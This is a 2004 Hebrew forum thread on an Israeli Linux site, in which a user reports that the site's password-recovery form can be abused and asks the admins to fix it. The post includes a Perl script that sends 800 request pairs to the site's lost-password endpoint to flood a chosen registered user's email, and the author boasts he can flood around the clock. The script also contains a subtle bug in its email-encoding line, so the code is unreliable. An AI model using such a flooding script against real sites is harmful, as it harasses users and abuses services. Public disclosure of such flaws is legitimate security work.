ווטסאפ - לינוקס, BSD, קוד פתוח ותוכנה חופשית בעברית. Whatsup - Linux, BSD, open source and free software in Hebrew

 
 
  כניסת חברים · רישום · שכחתי סיסמה  
tux the penguin
תגובה לנושא
צפיה בנושא הבא Printable version התחבר כדי לבדוק הודעות פרטיות צפיה בנושא הקודם
DI42loלא בפורום כעת ת.הצטרפות: 02/07/2004 · הודעות: 89 · מיקום: HOME$
 

הודעה פורסם: 04/09/2004 - 20:20
נושא ההודעה: אפשרות הצפת אימיילים באתר Whatsup..

יש באג קטנצ'יק פה באתר שנותן לספאמרים להציף את האימיילים של משתמשים רשומים במידה והוא משיג את האימייל והניק של משתמש.
בדרך כלל באתרים גדולים המערכת הזאת יותר הדוקה, פה ראיתי אותה כמשוחררת וגמישה להתקפות.
בדרך כלל צריך לכתוב סיסמאת אבטחה מתמונה ורק אז ניתן לקבל את הסיסמא לאימייל, פה אפשר להציף עם האימייל בעזרת סיסמא שנשלחת לאימייל בשביל לשחזר עם אותה סיסמא את הסיסמא לכניסה לאתר.(זה נשמע מסובך אבל זה לא)

דבר נוסף שדי גמיש הוא הסיסמא שנשלחת לאימייל בשביל לשחזר את הסיסמא של היוזר באתר.
היא לא רנדומלית לחלוטין היא משתנה פעם בכמה פעמים לא בידיוק בדקתי את זה אבל זה לא רנדומלי לחלוטין.
בכל אופן כתבתי קוד בפרל שעושה את זה :
קוד:
#!/usr/bin/perl
#use strict;
use LWP::Simple;
# Flood WhatsUp.Org.il mails of register users - By Di42lo#

my $nick=$ARGV[0];
my $mail=$ARGV[1];
my $password="f04fa";
my $times=800;
my $loop;
$mail=s/@/%40/;
for ($loop; $loop<$times; $loop++)
{
my $url1="http://whatsup.org.il/user.php?uname=$nick\&email=$mail\&code=&op=mailpasswd\&module=NS-LostPassword";
my $url2="http://whatsup.org.il/user.php?uname=$nick\&email=$mail\&code=$password\&op=mailpasswd&module=NS-LostPassword";
my $url1_shit=get($url1);
my $url2_shit=get($url2);
#print $url1_shit; print $url2_shit;
}


יאלה אדמינים תתקנו Embarassed
 
 צפיה בפרופיל המשתמש שלח הודעה פרטית שלח דוא\ ביקור באתר המפרסם מספר ICQ 
תגובה  עם ציטוט חזרה למעלה
חזרה לתוכן הדיון
omriלא בפורום כעת ת.הצטרפות: 24/11/2003 · הודעות: 1148 ·
 

הודעה פורסם: 04/09/2004 - 20:24
נושא ההודעה:

אתה בדקת שאין הגבלה לפעם ביום או משהו בסיגנון?
כלומר, בדקת שזה עובד?

_________________
Sure linux is user-friendly, it's just picky about who its friends are Smile
 
 צפיה בפרופיל המשתמש שלח הודעה פרטית ביקור באתר המפרסם  
תגובה  עם ציטוט חזרה למעלה
חזרה לתוכן הדיון
DI42loלא בפורום כעת ת.הצטרפות: 02/07/2004 · הודעות: 89 · מיקום: HOME$
 

הודעה פורסם: 04/09/2004 - 20:27
נושא ההודעה:

לא בדקתי ב800 פעמים כי לא רציתי להכביד על החיבור שלי אבל ב20 פעם זה עבד לי אין סיבה שלא יעבוד ביותר.

ולא אין הגבלה לפעם ב24 שעות. אני יכול להציף כמה שאני רוצה כל היום 24\7.
 
 צפיה בפרופיל המשתמש שלח הודעה פרטית שלח דוא\ ביקור באתר המפרסם מספר ICQ 
תגובה  עם ציטוט חזרה למעלה
חזרה לתוכן הדיון
הצגת הודעות מלפני:     
מעבר אל:  
כל הזמנים הם GMT + 2 שעות
תגובה לנושא
צפיה בנושא הבא Printable version התחבר כדי לבדוק הודעות פרטיות צפיה בנושא הקודם
PNphpBB2 © 2003-2004 

תוכן הדיון

  1. DI42lo
  2. omri
  3. DI42lo